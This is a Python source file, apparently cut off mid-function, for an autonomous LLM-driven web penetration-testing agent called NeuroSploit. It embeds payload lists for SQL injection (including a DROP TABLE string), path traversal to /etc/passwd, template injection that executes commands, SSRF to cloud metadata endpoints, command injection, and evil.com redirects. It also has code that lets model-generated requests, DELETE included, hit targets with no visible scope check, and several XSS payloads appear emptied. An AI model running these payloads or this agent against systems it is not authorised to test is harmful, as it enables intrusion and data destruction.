""" NeuroSploit v3 - Autonomous AI Security Agent REAL AI-powered penetration testing agent that: 1. Actually calls Claude/OpenAI API for intelligent analysis 2. Performs comprehensive reconnaissance 3. Tests vulnerabilities with proper verification (no false positives) 4. Generates detailed reports with CVSS, PoC, remediation """ import asyncio import aiohttp import json import re import os import hashlib from typing import Dict, List, Any, Optional, Callable, Tuple from dataclasses import dataclass, field, asdict from datetime import datetime from urllib.parse import urljoin, urlparse, parse_qs, urlencode from enum import Enum from pathlib import Path # Try to import anthropic for Claude API try: import anthropic ANTHROPIC_AVAILABLE = True except ImportError: ANTHROPIC_AVAILABLE = False anthropic = None # Try to import openai try: import openai OPENAI_AVAILABLE = True except ImportError: OPENAI_AVAILABLE = False openai = None class OperationMode(Enum): """Agent operation modes""" RECON_ONLY = "recon_only" FULL_AUTO = "full_auto" PROMPT_ONLY = "prompt_only" ANALYZE_ONLY = "analyze_only" class FindingSeverity(Enum): CRITICAL = "critical" HIGH = "high" MEDIUM = "medium" LOW = "low" INFO = "info" @dataclass class CVSSScore: """CVSS 3.1 Score""" score: float severity: str vector: str @dataclass class Finding: """Vulnerability finding with full details""" id: str title: str severity: str vulnerability_type: str = "" cvss_score: float = 0.0 cvss_vector: str = "" cwe_id: str = "" description: str = "" affected_endpoint: str = "" parameter: str = "" payload: str = "" evidence: str = "" request: str = "" response: str = "" impact: str = "" poc_code: str = "" remediation: str = "" references: List[str] = field(default_factory=list) ai_verified: bool = False confidence: str = "high" @dataclass class ReconData: """Reconnaissance data""" subdomains: List[str] = field(default_factory=list) live_hosts: List[str] = field(default_factory=list) endpoints: List[Dict] = field(default_factory=list) parameters: Dict[str, List[str]] = field(default_factory=dict) technologies: List[str] = field(default_factory=list) forms: List[Dict] = field(default_factory=list) js_files: List[str] = field(default_factory=list) api_endpoints: List[str] = field(default_factory=list) def _get_endpoint_url(ep) -> str: """Safely get URL from endpoint (handles both str and dict)""" if isinstance(ep, str): return ep elif isinstance(ep, dict): return ep.get("url", "") return "" def _get_endpoint_method(ep) -> str: """Safely get method from endpoint""" if isinstance(ep, dict): return ep.get("method", "GET") return "GET" class LLMClient: """Unified LLM client for Claude, OpenAI, Ollama, and Gemini""" # Ollama and LM Studio endpoints OLLAMA_URL = os.getenv("OLLAMA_URL", "http://localhost:11434") LMSTUDIO_URL = os.getenv("LMSTUDIO_URL", "http://localhost:1234") GEMINI_URL = "https://generativelanguage.googleapis.com/v1beta" def __init__(self): self.anthropic_key = os.getenv("ANTHROPIC_API_KEY", "") self.openai_key = os.getenv("OPENAI_API_KEY", "") self.google_key = os.getenv("GOOGLE_API_KEY", "") self.ollama_model = os.getenv("OLLAMA_MODEL", "llama3.2") self.client = None self.provider = None self.error_message = None self.connection_tested = False # Validate keys are not placeholder values if self.anthropic_key in ["", "your-anthropic-api-key"]: self.anthropic_key = None if self.openai_key in ["", "your-openai-api-key"]: self.openai_key = None if self.google_key in ["", "your-google-api-key"]: self.google_key = None # Try providers in order of preference self._initialize_provider() def _initialize_provider(self): """Initialize the first available LLM provider""" # 1. Try Claude (Anthropic) if ANTHROPIC_AVAILABLE and self.anthropic_key: try: self.client = anthropic.Anthropic(api_key=self.anthropic_key) self.provider = "claude" print("[LLM] Claude API initialized successfully") return except Exception as e: self.error_message = f"Claude init error: {e}" print(f"[LLM] Claude initialization failed: {e}") # 2. Try OpenAI if OPENAI_AVAILABLE and self.openai_key: try: self.client = openai.OpenAI(api_key=self.openai_key) self.provider = "openai" print("[LLM] OpenAI API initialized successfully") return except Exception as e: self.error_message = f"OpenAI init error: {e}" print(f"[LLM] OpenAI initialization failed: {e}") # 3. Try Google Gemini if self.google_key: self.client = "gemini" # Placeholder - uses HTTP requests self.provider = "gemini" print("[LLM] Gemini API initialized") return # 4. Try Ollama (local) if self._check_ollama(): self.client = "ollama" # Placeholder - uses HTTP requests self.provider = "ollama" print(f"[LLM] Ollama initialized with model: {self.ollama_model}") return # 5. Try LM Studio (local) if self._check_lmstudio(): self.client = "lmstudio" # Placeholder - uses HTTP requests self.provider = "lmstudio" print("[LLM] LM Studio initialized") return # No provider available self._set_no_provider_error() def _check_ollama(self) -> bool: """Check if Ollama is running locally""" try: import requests response = requests.get(f"{self.OLLAMA_URL}/api/tags", timeout=2) return response.status_code == 200 except Exception: return False def _check_lmstudio(self) -> bool: """Check if LM Studio is running locally""" try: import requests response = requests.get(f"{self.LMSTUDIO_URL}/v1/models", timeout=2) return response.status_code == 200 except Exception: return False def _set_no_provider_error(self): """Set appropriate error message when no provider is available""" errors = [] if not ANTHROPIC_AVAILABLE and not OPENAI_AVAILABLE: errors.append("LLM libraries not installed (run: pip install anthropic openai)") if not self.anthropic_key and not self.openai_key and not self.google_key: errors.append("No API keys configured") if not self._check_ollama(): errors.append("Ollama not running locally") if not self._check_lmstudio(): errors.append("LM Studio not running locally") self.error_message = "No LLM provider available. " + "; ".join(errors) print(f"[LLM] WARNING: {self.error_message}") def is_available(self) -> bool: return self.client is not None def get_status(self) -> dict: """Get LLM status for debugging""" return { "available": self.is_available(), "provider": self.provider, "error": self.error_message, "anthropic_lib": ANTHROPIC_AVAILABLE, "openai_lib": OPENAI_AVAILABLE, "ollama_available": self._check_ollama(), "lmstudio_available": self._check_lmstudio(), "has_google_key": bool(self.google_key) } async def test_connection(self) -> Tuple[bool, str]: """Test if the API connection is working""" if not self.client: return False, self.error_message or "No LLM client configured" try: # Simple test prompt result = await self.generate("Say 'OK' if you can hear me.", max_tokens=10) if result: self.connection_tested = True return True, f"Connected to {self.provider}" return False, f"Empty response from {self.provider}" except Exception as e: return False, f"Connection test failed for {self.provider}: {str(e)}" async def generate(self, prompt: str, system: str = "", max_tokens: int = 4096) -> str: """Generate response from LLM""" if not self.client: raise LLMConnectionError(self.error_message or "No LLM provider available") default_system = "You are an expert penetration tester and security researcher. Provide accurate, technical, and actionable security analysis. Be precise and avoid false positives." try: if self.provider == "claude": message = self.client.messages.create( model="claude-sonnet-4-20250514", max_tokens=max_tokens, system=system or default_system, messages=[{"role": "user", "content": prompt}] ) return message.content[0].text elif self.provider == "openai": response = self.client.chat.completions.create( model="gpt-4-turbo-preview", max_tokens=max_tokens, messages=[ {"role": "system", "content": system or default_system}, {"role": "user", "content": prompt} ] ) return response.choices[0].message.content elif self.provider == "gemini": return await self._generate_gemini(prompt, system or default_system, max_tokens) elif self.provider == "ollama": return await self._generate_ollama(prompt, system or default_system) elif self.provider == "lmstudio": return await self._generate_lmstudio(prompt, system or default_system, max_tokens) except LLMConnectionError: raise except Exception as e: error_msg = str(e) print(f"[LLM] Error from {self.provider}: {error_msg}") raise LLMConnectionError(f"API call failed ({self.provider}): {error_msg}") return "" async def _generate_gemini(self, prompt: str, system: str, max_tokens: int) -> str: """Generate using Google Gemini API""" import aiohttp url = f"{self.GEMINI_URL}/models/gemini-pro:generateContent?key={self.google_key}" payload = { "contents": [{"parts": [{"text": f"{system}\n\n{prompt}"}]}], "generationConfig": {"maxOutputTokens": max_tokens} } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=60)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"Gemini API error ({response.status}): {error_text}") data = await response.json() return data.get("candidates", [{}])[0].get("content", {}).get("parts", [{}])[0].get("text", "") async def _generate_ollama(self, prompt: str, system: str) -> str: """Generate using local Ollama""" import aiohttp url = f"{self.OLLAMA_URL}/api/generate" payload = { "model": self.ollama_model, "prompt": prompt, "system": system, "stream": False } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=120)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"Ollama error ({response.status}): {error_text}") data = await response.json() return data.get("response", "") async def _generate_lmstudio(self, prompt: str, system: str, max_tokens: int) -> str: """Generate using LM Studio (OpenAI-compatible)""" import aiohttp url = f"{self.LMSTUDIO_URL}/v1/chat/completions" payload = { "messages": [ {"role": "system", "content": system}, {"role": "user", "content": prompt} ], "max_tokens": max_tokens, "stream": False } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=120)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"LM Studio error ({response.status}): {error_text}") data = await response.json() return data.get("choices", [{}])[0].get("message", {}).get("content", "") class LLMConnectionError(Exception): """Exception raised when LLM connection fails""" pass class AutonomousAgent: """ AI-Powered Autonomous Security Agent Performs real security testing with AI-powered analysis """ # Comprehensive payload sets for testing PAYLOADS = { "sqli": [ "'", "\"", "' OR '1'='1", "\" OR \"1\"=\"1", "' OR 1=1--", "admin'--", "1' AND '1'='1", "1 AND 1=1", "' UNION SELECT NULL--", "1' AND SLEEP(5)--", "1' WAITFOR DELAY '0:0:5'--", "1'; DROP TABLE users--", "' OR ''='", "1' ORDER BY 1--" ], "xss": [ "", "", "\">", "'-alert('XSS')-'", "", "javascript:alert('XSS')", "", "{{constructor.constructor('alert(1)')()}}", "", ], "lfi": [ "../../../etc/passwd", "....//....//....//etc/passwd", "/etc/passwd", "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts", "php://filter/convert.base64-encode/resource=index.php", "file:///etc/passwd", "/proc/self/environ", "..%2f..%2f..%2fetc%2fpasswd", "....\/....\/....\/etc/passwd" ], "ssti": [ "{{7*7}}", "${7*7}", "<%= 7*7 %>", "#{7*7}", "*{7*7}", "{{config}}", "{{self.__class__.__mro__}}", "${T(java.lang.Runtime).getRuntime().exec('id')}", "{{''.__class__.__mro__[1].__subclasses__()}}" ], "ssrf": [ "http://127.0.0.1", "http://localhost", "http://169.254.169.254/latest/meta-data/", "http://[::1]", "http://0.0.0.0", "file:///etc/passwd", "http://metadata.google.internal/", "http://100.100.100.200/" ], "rce": [ "; id", "| id", "$(id)", "`id`", "&& id", "; cat /etc/passwd", "| cat /etc/passwd", "; whoami", "| whoami", "&& whoami" ], "open_redirect": [ "//evil.com", "https://evil.com", "/\\evil.com", "//evil.com/%2f..", "https:evil.com", "////evil.com" ] } # Vulnerability indicators for each type VULN_INDICATORS = { "sqli": { "errors": [ "sql syntax", "mysql_", "pg_query", "ora-", "sqlite_", "database error", "syntax error", "unclosed quotation", "you have an error in your sql", "warning: mysql", "postgresql", "microsoft sql native client error", "odbc drivers error", "invalid query", "sql command" ], "blind_indicators": ["different response", "time delay"] }, "xss": { "reflection_check": True, # Check if payload is reflected "context_check": True # Check if in dangerous context }, "lfi": { "content": [ "root:x:", "root:*:", "[boot loader]", "localhost", "daemon:x:", "bin:x:", "sys:x:", "www-data" ] }, "ssti": { "evaluation": {"7*7": "49", "7*'7'": "7777777"} }, "ssrf": { "internal_access": ["127.0.0.1", "localhost", "internal"] } } def __init__( self, target: str, mode: OperationMode = OperationMode.FULL_AUTO, log_callback: Optional[Callable] = None, progress_callback: Optional[Callable] = None, auth_headers: Optional[Dict] = None, task: Optional[Any] = None, custom_prompt: Optional[str] = None, recon_context: Optional[Dict] = None, finding_callback: Optional[Callable] = None, ): self.target = self._normalize_target(target) self.mode = mode self.log = log_callback or self._default_log self.progress_callback = progress_callback self.finding_callback = finding_callback self.auth_headers = auth_headers or {} self.task = task self.custom_prompt = custom_prompt self.recon_context = recon_context self._cancelled = False self.session: Optional[aiohttp.ClientSession] = None self.llm = LLMClient() # Data storage self.recon = ReconData() self.findings: List[Finding] = [] self.tested_payloads: set = set() self.custom_prompts: List[str] = [] def cancel(self): """Cancel the agent execution""" self._cancelled = True def is_cancelled(self) -> bool: """Check if agent was cancelled""" return self._cancelled async def add_custom_prompt(self, prompt: str): """Add a custom prompt to be processed""" self.custom_prompts.append(prompt) await self.log_llm("info", f"[USER PROMPT RECEIVED] {prompt}") # Process immediately if LLM is available if self.llm.is_available(): await self._process_custom_prompt(prompt) async def _process_custom_prompt(self, prompt: str): """Process a custom user prompt with the LLM and execute requested tests""" await self.log_llm("info", f"[AI] Processing user prompt: {prompt}") # Build context about available endpoints endpoints_info = [] for ep in self.recon.endpoints[:20]: # Limit to 20 for context endpoints_info.append(f"- {_get_endpoint_method(ep)} {_get_endpoint_url(ep)}") params_info = [] for param, values in list(self.recon.parameters.items())[:15]: params_info.append(f"- {param}: {values[:3]}") system_prompt = f"""You are an expert penetration tester analyzing {self.target}. The user has requested a specific test. Analyze the request and provide a structured response. Current reconnaissance data: Endpoints ({len(self.recon.endpoints)} total): {chr(10).join(endpoints_info[:10]) if endpoints_info else ' None discovered yet'} Parameters ({len(self.recon.parameters)} total): {chr(10).join(params_info[:10]) if params_info else ' None discovered yet'} Technologies detected: {', '.join(self.recon.technologies) if self.recon.technologies else 'None'} IMPORTANT: Respond in this JSON format: {{ "analysis": "Your analysis of what the user is asking", "action": "test_endpoint|test_parameter|scan_for|analyze|info", "targets": ["list of specific URLs or parameters to test"], "vuln_types": ["xss", "sqli", "idor", "ssrf", etc - if applicable], "response": "Your detailed response to show the user" }} If the request is unclear or just informational, use action "info" and provide helpful guidance.""" try: response = await self.llm.generate(prompt, system=system_prompt) if not response: await self.log_llm("warning", "[AI] No response from LLM") return await self.log_llm("info", f"[AI] Analyzing request...") # Try to parse as JSON for structured actions import json try: # Extract JSON from response json_match = re.search(r'\{[\s\S]*\}', response) if json_match: action_data = json.loads(json_match.group()) action = action_data.get("action", "info") targets = action_data.get("targets", []) vuln_types = action_data.get("vuln_types", []) ai_response = action_data.get("response", response) await self.log_llm("info", f"[AI RESPONSE] {ai_response}") # Execute the requested action if action == "test_endpoint" and targets: await self.log_llm("info", f"[AI] Executing endpoint tests on {len(targets)} targets...") for target_url in targets[:5]: # Limit to 5 targets await self._test_custom_endpoint(target_url, vuln_types or ["xss", "sqli"]) elif action == "test_parameter" and targets: await self.log_llm("info", f"[AI] Testing parameters: {targets}") await self._test_custom_parameters(targets, vuln_types or ["xss", "sqli"]) elif action == "scan_for" and vuln_types: await self.log_llm("info", f"[AI] Scanning for: {vuln_types}") for vtype in vuln_types[:3]: # Limit to 3 vuln types await self._scan_for_vuln_type(vtype) elif action == "analyze": await self.log_llm("info", f"[AI] Analysis complete - check response above") else: await self.log_llm("info", f"[AI] Informational response provided") else: # No structured JSON, just show the response await self.log_llm("info", f"[AI RESPONSE] {response[:1000]}") except json.JSONDecodeError: # If not valid JSON, just show the response await self.log_llm("info", f"[AI RESPONSE] {response[:1000]}") except Exception as e: await self.log_llm("error", f"[AI] Error processing prompt: {str(e)}") async def _test_custom_endpoint(self, url: str, vuln_types: List[str]): """Test a specific endpoint for vulnerabilities""" if not self.session: return await self.log("info", f" Testing endpoint: {url}") try: # Parse URL to find parameters parsed = urlparse(url) params = parse_qs(parsed.query) if not params: # Try adding common parameters params = {"id": ["1"], "q": ["test"]} for param_name in list(params.keys())[:3]: for vtype in vuln_types[:2]: payloads = self.PAYLOADS.get(vtype, [])[:2] for payload in payloads: await self._test_single_param(url, param_name, payload, vtype) except Exception as e: await self.log("debug", f" Error testing {url}: {e}") async def _test_custom_parameters(self, param_names: List[str], vuln_types: List[str]): """Test specific parameters across known endpoints""" endpoints_with_params = [ ep for ep in self.recon.endpoints if any(p in str(ep) for p in param_names) ] if not endpoints_with_params: # Use all endpoints that have parameters endpoints_with_params = self.recon.endpoints[:10] for ep in endpoints_with_params[:5]: url = _get_endpoint_url(ep) for param in param_names[:3]: for vtype in vuln_types[:2]: payloads = self.PAYLOADS.get(vtype, [])[:2] for payload in payloads: await self._test_single_param(url, param, payload, vtype) async def _scan_for_vuln_type(self, vuln_type: str): """Scan all endpoints for a specific vulnerability type""" await self.log("info", f" Scanning for {vuln_type.upper()} vulnerabilities...") vuln_lower = vuln_type.lower() # Handle header-based vulnerabilities (no payloads needed) if vuln_lower in ["clickjacking", "x-frame-options", "csp", "hsts", "headers", "security headers", "missing headers"]: await self._test_security_headers(vuln_lower) return # Handle CORS testing if vuln_lower in ["cors", "cross-origin"]: await self._test_cors() return # Handle information disclosure if vuln_lower in ["info", "information disclosure", "version", "technology"]: await self._test_information_disclosure() return # Standard payload-based testing payloads = self.PAYLOADS.get(vuln_type, [])[:3] if not payloads: # Try AI-based testing for unknown vuln types await self._ai_test_vulnerability(vuln_type) return for ep in self.recon.endpoints[:10]: url = _get_endpoint_url(ep) for param in list(self.recon.parameters.keys())[:5]: for payload in payloads: await self._test_single_param(url, param, payload, vuln_type) async def _test_security_headers(self, vuln_type: str): """Test for security header vulnerabilities like clickjacking""" await self.log("info", f" Testing security headers...") # Test main target and key pages test_urls = [self.target] for ep in self.recon.endpoints[:5]: url = _get_endpoint_url(ep) if isinstance(ep, dict) else ep if url and url not in test_urls: test_urls.append(url) for url in test_urls: try: async with self.session.get(url, allow_redirects=True) as resp: headers = dict(resp.headers) headers_lower = {k.lower(): v for k, v in headers.items()} findings = [] # Check X-Frame-Options (Clickjacking) x_frame = headers_lower.get("x-frame-options", "") csp = headers_lower.get("content-security-policy", "") if not x_frame and "frame-ancestors" not in csp.lower(): findings.append({ "type": "clickjacking", "title": "Missing Clickjacking Protection", "severity": "medium", "description": "The page lacks X-Frame-Options header and CSP frame-ancestors directive, making it vulnerable to clickjacking attacks.", "evidence": f"X-Frame-Options: Not set\nCSP: {csp[:100] if csp else 'Not set'}", "remediation": "Add 'X-Frame-Options: DENY' or 'X-Frame-Options: SAMEORIGIN' header, or use 'frame-ancestors' in CSP." }) await self.log("warning", f" [FOUND] Clickjacking vulnerability - missing X-Frame-Options") # Check HSTS hsts = headers_lower.get("strict-transport-security", "") if not hsts and url.startswith("https"): findings.append({ "type": "missing_hsts", "title": "Missing HSTS Header", "severity": "low", "description": "HTTPS site without Strict-Transport-Security header, vulnerable to protocol downgrade attacks.", "evidence": "Strict-Transport-Security: Not set", "remediation": "Add 'Strict-Transport-Security: max-age=31536000; includeSubDomains' header." }) # Check X-Content-Type-Options if "x-content-type-options" not in headers_lower: findings.append({ "type": "missing_xcto", "title": "Missing X-Content-Type-Options Header", "severity": "low", "description": "Missing nosniff header allows MIME-sniffing attacks.", "evidence": "X-Content-Type-Options: Not set", "remediation": "Add 'X-Content-Type-Options: nosniff' header." }) # Check CSP if not csp: findings.append({ "type": "missing_csp", "title": "Missing Content-Security-Policy Header", "severity": "low", "description": "No Content-Security-Policy header, increasing XSS risk.", "evidence": "Content-Security-Policy: Not set", "remediation": "Implement a restrictive Content-Security-Policy." }) # Create findings for f in findings: finding = Finding( id=hashlib.md5(f"{f['type']}{url}".encode()).hexdigest()[:8], title=f["title"], severity=f["severity"], vulnerability_type=f["type"], cvss_score={"critical": 9.0, "high": 7.0, "medium": 4.0, "low": 3.0}.get(f["severity"], 3.0), cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", cwe_id="CWE-1021" if "clickjacking" in f["type"] else "CWE-693", description=f["description"], affected_endpoint=url, evidence=f["evidence"], remediation=f["remediation"], ai_verified=True ) await self._add_finding(finding) except Exception as e: await self.log("debug", f" Header test error: {e}") async def _test_cors(self): """Test for CORS misconfigurations""" await self.log("info", f" Testing CORS configuration...") test_origins = [ "https://evil.com", "https://attacker.com", "null" ] for url in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3]]: if not url: continue for origin in test_origins: try: headers = {"Origin": origin} async with self.session.get(url, headers=headers) as resp: acao = resp.headers.get("Access-Control-Allow-Origin", "") acac = resp.headers.get("Access-Control-Allow-Credentials", "") if acao == origin or acao == "*": severity = "high" if acac.lower() == "true" else "medium" finding = Finding( id=hashlib.md5(f"cors{url}{origin}".encode()).hexdigest()[:8], title=f"CORS Misconfiguration - {origin}", severity=severity, vulnerability_type="cors", cvss_score=7.5 if severity == "high" else 5.0, cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", cwe_id="CWE-942", description=f"The server reflects the Origin header '{origin}' in Access-Control-Allow-Origin, potentially allowing cross-origin data theft.", affected_endpoint=url, evidence=f"Origin: {origin}\nAccess-Control-Allow-Origin: {acao}\nAccess-Control-Allow-Credentials: {acac}", remediation="Configure CORS to only allow trusted origins. Avoid using wildcard (*) or reflecting arbitrary origins.", ai_verified=True ) await self._add_finding(finding) await self.log("warning", f" [FOUND] CORS misconfiguration at {url[:50]}") break except: pass async def _test_information_disclosure(self): """Test for information disclosure""" await self.log("info", f" Testing for information disclosure...") for url in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:5]]: if not url: continue try: async with self.session.get(url) as resp: headers = dict(resp.headers) # Server header disclosure server = headers.get("Server", "") if server and any(v in server.lower() for v in ["apache/", "nginx/", "iis/", "tomcat/"]): finding = Finding( id=hashlib.md5(f"server{url}".encode()).hexdigest()[:8], title="Server Version Disclosure", severity="info", vulnerability_type="information_disclosure", cvss_score=0.0, cwe_id="CWE-200", description=f"The server discloses its version: {server}", affected_endpoint=url, evidence=f"Server: {server}", remediation="Remove or obfuscate the Server header to prevent version disclosure.", ai_verified=True ) await self._add_finding(finding) # X-Powered-By disclosure powered_by = headers.get("X-Powered-By", "") if powered_by: finding = Finding( id=hashlib.md5(f"poweredby{url}".encode()).hexdigest()[:8], title="Technology Version Disclosure", severity="info", vulnerability_type="information_disclosure", cvss_score=0.0, cwe_id="CWE-200", description=f"The X-Powered-By header reveals technology: {powered_by}", affected_endpoint=url, evidence=f"X-Powered-By: {powered_by}", remediation="Remove the X-Powered-By header.", ai_verified=True ) await self._add_finding(finding) except: pass async def _ai_dynamic_test(self, user_prompt: str): """ AI-driven dynamic vulnerability testing - can test ANY vulnerability type. The LLM generates payloads, test strategies, and analyzes results dynamically. Examples of what this can test: - XXE (XML External Entity) - Race Conditions - Rate Limiting Bypass - WAF Bypass - CSP Bypass - BFLA (Broken Function Level Authorization) - BOLA (Broken Object Level Authorization) - JWT vulnerabilities - GraphQL injection - NoSQL injection - Prototype pollution - And ANY other vulnerability type! """ await self.log("info", f"[AI DYNAMIC TEST] Processing: {user_prompt}") if not self.llm.is_available(): await self.log("warning", " LLM not available - attempting basic tests based on prompt") await self._ai_test_fallback(user_prompt) return # Gather reconnaissance context endpoints_info = [] for ep in self.recon.endpoints[:15]: url = _get_endpoint_url(ep) method = _get_endpoint_method(ep) if url: endpoints_info.append({"url": url, "method": method}) forms_info = [] for form in self.recon.forms[:5]: if isinstance(form, dict): forms_info.append({ "action": form.get("action", ""), "method": form.get("method", "GET"), "inputs": form.get("inputs", [])[:5] }) context = f""" TARGET: {self.target} TECHNOLOGIES: {', '.join(self.recon.technologies) if self.recon.technologies else 'Unknown'} ENDPOINTS ({len(endpoints_info)} found): {json.dumps(endpoints_info[:10], indent=2)} FORMS ({len(forms_info)} found): {json.dumps(forms_info, indent=2)} PARAMETERS DISCOVERED: {list(self.recon.parameters.keys())[:20]} """ # Phase 1: Ask AI to understand the vulnerability and create test strategy strategy_prompt = f"""You are an expert penetration tester. The user wants to test for: "{user_prompt}" Based on the target information below, create a comprehensive testing strategy. {context} Respond in JSON format with: {{ "vulnerability_type": "name of the vulnerability being tested", "cwe_id": "CWE-XXX if applicable", "owasp_category": "OWASP category if applicable", "description": "Brief description of what this vulnerability is", "severity_if_found": "critical|high|medium|low", "cvss_estimate": 0.0-10.0, "test_cases": [ {{ "name": "Test case name", "technique": "Technique being used", "url": "URL to test (use actual URLs from context)", "method": "GET|POST|PUT|DELETE", "headers": {{"Header-Name": "value"}}, "body": "request body if POST/PUT", "content_type": "application/json|application/xml|application/x-www-form-urlencoded", "success_indicators": ["what to look for in response that indicates vulnerability"], "failure_indicators": ["what indicates NOT vulnerable"] }} ], "payloads": ["list of specific payloads to try"], "analysis_tips": "What patterns or behaviors indicate this vulnerability" }} Generate at least 3-5 realistic test cases using the actual endpoints from the context. Be creative and thorough - think like a real penetration tester.""" await self.log("info", " Phase 1: AI generating test strategy...") try: strategy_response = await self.llm.generate( strategy_prompt, "You are an expert penetration tester specializing in web application security. Provide detailed, actionable test strategies." ) # Extract JSON from response match = re.search(r'\{[\s\S]*\}', strategy_response) if not match: await self.log("warning", " AI did not return valid JSON strategy, using fallback") await self._ai_test_fallback(user_prompt) return strategy = json.loads(match.group()) vuln_type = strategy.get("vulnerability_type", user_prompt) cwe_id = strategy.get("cwe_id", "") severity = strategy.get("severity_if_found", "medium") cvss = strategy.get("cvss_estimate", 5.0) description = strategy.get("description", f"Testing for {vuln_type}") await self.log("info", f" Vulnerability: {vuln_type}") await self.log("info", f" CWE: {cwe_id} | Severity: {severity} | CVSS: {cvss}") await self.log("info", f" Test cases: {len(strategy.get('test_cases', []))}") # Phase 2: Execute test cases await self.log("info", " Phase 2: Executing AI-generated test cases...") test_results = [] for i, test_case in enumerate(strategy.get("test_cases", [])[:10]): test_name = test_case.get("name", f"Test {i+1}") await self.log("debug", f" Running: {test_name}") result = await self._execute_ai_dynamic_test(test_case) if result: result["test_name"] = test_name result["success_indicators"] = test_case.get("success_indicators", []) result["failure_indicators"] = test_case.get("failure_indicators", []) test_results.append(result) # Phase 3: AI analysis of results await self.log("info", " Phase 3: AI analyzing results...") analysis_prompt = f"""Analyze these test results for {vuln_type} vulnerability. VULNERABILITY BEING TESTED: {vuln_type} {description} ANALYSIS TIPS: {strategy.get('analysis_tips', 'Look for error messages, unexpected behavior, or data leakage')} TEST RESULTS: {json.dumps(test_results[:5], indent=2, default=str)[:8000]} For each test result, analyze if it indicates a vulnerability. Consider: - Success indicators: {strategy.get('test_cases', [{}])[0].get('success_indicators', [])} - Response status codes, error messages, timing differences, data in response Respond in JSON: {{ "findings": [ {{ "is_vulnerable": true|false, "confidence": "high|medium|low", "test_name": "which test", "evidence": "specific evidence from response", "explanation": "why this indicates vulnerability" }} ], "overall_assessment": "summary of findings", "recommendations": ["list of remediation steps"] }}""" analysis_response = await self.llm.generate( analysis_prompt, "You are a security analyst. Analyze test results and identify vulnerabilities with precision. Only report real findings with clear evidence." ) # Parse analysis analysis_match = re.search(r'\{[\s\S]*\}', analysis_response) if analysis_match: analysis = json.loads(analysis_match.group()) for finding_data in analysis.get("findings", []): if finding_data.get("is_vulnerable") and finding_data.get("confidence") in ["high", "medium"]: evidence = finding_data.get("evidence", "") test_name = finding_data.get("test_name", "AI Test") # Find the matching test result for endpoint affected_endpoint = self.target for tr in test_results: if tr.get("test_name") == test_name: affected_endpoint = tr.get("url", self.target) break finding = Finding( id=hashlib.md5(f"{vuln_type}{affected_endpoint}{test_name}".encode()).hexdigest()[:8], title=f"{vuln_type}", severity=severity, vulnerability_type=vuln_type.lower().replace(" ", "_"), cvss_score=float(cvss) if cvss else 5.0, cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", cwe_id=cwe_id or "CWE-1035", description=f"{description}\n\nAI Explanation: {finding_data.get('explanation', '')}", affected_endpoint=affected_endpoint, evidence=evidence[:1000], remediation="\n".join(analysis.get("recommendations", [f"Remediate the {vuln_type} vulnerability"])), ai_verified=True ) await self._add_finding(finding) await self.log("warning", f" [AI FOUND] {vuln_type} - {finding_data.get('confidence')} confidence") await self.log("info", f" Assessment: {analysis.get('overall_assessment', 'Analysis complete')[:100]}") except json.JSONDecodeError as e: await self.log("warning", f" JSON parse error: {e}") await self._ai_test_fallback(user_prompt) except Exception as e: await self.log("error", f" AI dynamic test error: {e}") await self._ai_test_fallback(user_prompt) async def _execute_ai_dynamic_test(self, test_case: Dict) -> Optional[Dict]: """Execute a single AI-generated test case""" if not self.session: return None try: url = test_case.get("url", self.target) method = test_case.get("method", "GET").upper() headers = test_case.get("headers", {}) body = test_case.get("body", "") content_type = test_case.get("content_type", "") if content_type and "Content-Type" not in headers: headers["Content-Type"] = content_type start_time = asyncio.get_event_loop().time() if method == "GET": async with self.session.get(url, headers=headers, allow_redirects=False) as resp: response_body = await resp.text() response_time = asyncio.get_event_loop().time() - start_time return { "url": url, "method": method, "status": resp.status, "headers": dict(list(resp.headers.items())[:20]), "body_preview": response_body[:2000], "body_length": len(response_body), "response_time": round(response_time, 3) } elif method == "POST": if content_type == "application/json" and isinstance(body, str): try: body = json.loads(body) except: pass async with self.session.post(url, headers=headers, data=body if isinstance(body, str) else None, json=body if isinstance(body, dict) else None, allow_redirects=False) as resp: response_body = await resp.text() response_time = asyncio.get_event_loop().time() - start_time return { "url": url, "method": method, "status": resp.status, "headers": dict(list(resp.headers.items())[:20]), "body_preview": response_body[:2000], "body_length": len(response_body), "response_time": round(response_time, 3) } elif method in ["PUT", "DELETE", "PATCH"]: request_method = getattr(self.session, method.lower()) async with request_method(url, headers=headers, data=body, allow_redirects=False) as resp: response_body = await resp.text() response_time = asyncio.get_event_loop().time() - start_time return { "url": url, "method": method, "status": resp.status, "headers": dict(list(resp.headers.items())[:20]), "body_preview": response_body[:2000], "body_length": len(response_body), "response_time": round(response_time, 3) } except Exception as e: return { "url": url, "method": method, "error": str(e), "status": 0 } return None async def _ai_test_fallback(self, user_prompt: str): """Fallback testing when LLM is not available - uses keyword detection""" await self.log("info", f" Running fallback tests for: {user_prompt}") prompt_lower = user_prompt.lower() # Define fallback test mappings fallback_tests = { "xxe": self._test_xxe_fallback, "xml": self._test_xxe_fallback, "race": self._test_race_condition_fallback, "rate": self._test_rate_limit_fallback, "bola": self._test_idor_fallback, "idor": self._test_idor_fallback, "bfla": self._test_bfla_fallback, "jwt": self._test_jwt_fallback, "graphql": self._test_graphql_fallback, "nosql": self._test_nosql_fallback, "waf": self._test_waf_bypass_fallback, "csp": self._test_csp_bypass_fallback, } tests_run = False for keyword, test_func in fallback_tests.items(): if keyword in prompt_lower: await test_func() tests_run = True if not tests_run: await self.log("warning", " No fallback test matched. LLM required for this test type.") async def _test_xxe_fallback(self): """Test for XXE without LLM""" await self.log("info", " Testing XXE (XML External Entity)...") xxe_payloads = [ ']>&xxe;', ']>&xxe;', '%xxe;]>', ] for endpoint in 